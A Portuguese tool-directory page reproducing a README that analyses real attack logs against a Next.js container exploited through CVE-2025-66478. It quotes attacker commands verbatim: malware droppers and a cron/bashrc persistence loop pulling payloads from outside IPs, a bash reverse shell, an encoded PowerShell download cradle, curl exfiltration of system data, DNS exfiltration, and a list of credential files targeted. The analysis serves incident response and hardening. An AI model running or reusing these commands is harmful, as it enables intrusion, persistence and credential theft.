Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-66478 — Análise de logs de ataque do mundo real do CVE-2025-66478 (Next.js Server Actions RCE) com amostras de malware, rastreamento de IP do atacante e lições de fortalecimento de segurança de contêineres. | Kitploit
Ferramentas/GitHubGitHub/exptechtw/cve-2025-66478
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAnálise ForenseAnálise de MalwareInteligência de AmeaçasAprendizado e EducaçãoResposta a Incidentes
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

Análise de logs de ataque do mundo real do CVE-2025-66478 (Next.js Server Actions RCE) com amostras de malware, rastreamento de IP do atacante e lições de fortalecimento de segurança de contêineres.

211há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

CVE-2025-66478 - Análise de Logs de Ataques Reais de RCE em Server Actions do Next.js

Resumo

Este projeto reúne logs de ataque reais registrados por uma aplicação Next.js 15.1.2 exposta na internet (executando em um contêiner Docker). Estes logs demonstram a varredura e exploração em larga escala da vulnerabilidade CVE-2025-66478 por ferramentas automatizadas de ataque.

Período de registo: 2025-12-04 ~ 2025-12-06 (aproximadamente 48 horas)

Informações do ambiente:

  • Framework: Next.js 15.1.2
  • Ambiente de execução: Bun v1.2.20
  • Contêiner: Docker (Alpine Linux)
  • Fuso horário: Ásia/Taipei

Estatísticas por tipo de ataque

1. Download e execução de malware (Dropper/Downloader)

Os atacantes tentaram executar comandos para baixar e executar malware através da vulnerabilidade.

IP de origem do ataqueURL do payload maliciosoDescrição
216.158.232.43http://216.158.232.43:12000/sex.shBotnet/minerador
38.207.161.212http://38.207.161.212/agentPrograma agente malicioso
43.156.63.124http://43.156.63.124/tsdBackdoor persistente via cron
154.38.121.219res.qiqigece.top/nginx3Malware disfarçado de nginx
47.79.42.91iot.632313373.xyz/nz.shScript de botnet IoT
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.shMinerador/backdoor
103.135.101.15http://103.135.101.15/wocaosinm.shScript malicioso
38.12.24.231http://38.12.24.231/kworkerMalware disfarçado de kernel worker
128.199.194.97http://128.199.194.97:9001/setup2.shScript de inicialização

Exemplos de comandos de ataque

# Ataque dropper típico
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# Backdoor persistente via cron
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# Ataque de persistência complexo (múltiplos métodos de download + cron + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. Reverse Shell

Os atacantes tentaram estabelecer conexões reverse shell para obter acesso interativo.

# Bash reverse shell
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. Ataques PowerShell (erro de avaliação para Windows)

Os atacantes assumiram que o alvo era um sistema Windows e tentaram executar comandos PowerShell.

# PowerShell malicioso codificado em Base64
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# Decodificado:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# Cálculos matemáticos usados para confirmação da vulnerabilidade
powershell -c "41*271"      # = 11111 (confirmação de assinatura)
powershell -c "44225*41002" # = 1814113450

4. Coleta de informações (Information Gathering)

Os atacantes tentaram coletar informações do sistema para ataques posteriores.

# Coleta de informações do sistema e exfiltração
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. Roubo de credenciais (Credential Harvesting)

Os atacantes tentaram ler vários arquivos sensíveis e credenciais.

Caminhos sensíveis tentados

CategoriaCaminho
Credenciais cloud/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
Chaves SSH/root/.ssh/id_rsa, /root/.ssh/config
Credenciais Git/root/.git-credentials, /root/.gitconfig
Container/K8s/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
Aplicação/proc/self/cwd/serviceAccountKey.json (Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
Histórico Shell/root/.bash_history, /root/.zsh_history
Ferramentas cloud/root/.ossutilconfig (Alibaba Cloud OSS)
/root/.npmrc
Configuração do sistema/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow

6. Vazamento de variáveis de ambiente

Variáveis de ambiente do contêiner vazadas com sucesso através da vulnerabilidade:

HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. Exfiltração via DNS (DNS Exfiltration)

Os atacantes usaram consultas DNS para exfiltração de dados ou confirmação da vulnerabilidade:

ping 5a58e4a0.log.dnslog.pp.ua.

Motivos para a falha dos ataques

A maioria dos ataques falhou devido à natureza minimalista do contêiner Alpine Linux:

Ferramenta ausenteImpacto
curlIncapacidade de baixar payloads maliciosos
bashIncapacidade de executar sintaxe específica do bash (ex.: reverse shell)
powershellAtaques Windows ineficazes
pythonIncapacidade de usar downloader Python

Embora wget estivesse disponível, alguns scripts maliciosos internamente dependiam de curl ou bash, resultando em falha na execução.


Exemplos de decodificação Base64

Os logs contêm muitos dados codificados em Base64. Abaixo estão alguns resultados decodificados:

Exfiltração de informações do sistema

# digest: 'cm9vdAo='
Decodificado: root

# digest: 'dGVzdAo='
Decodificado: test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
Decodificado: vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
Decodificado: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Exfiltração de listagem de diretório

# Conteúdo do diretório /tmp
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

Decodificado:
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

Estatísticas de IPs de ataque

Abaixo estão os endereços IP de ataque registrados:

Baixar ferramenta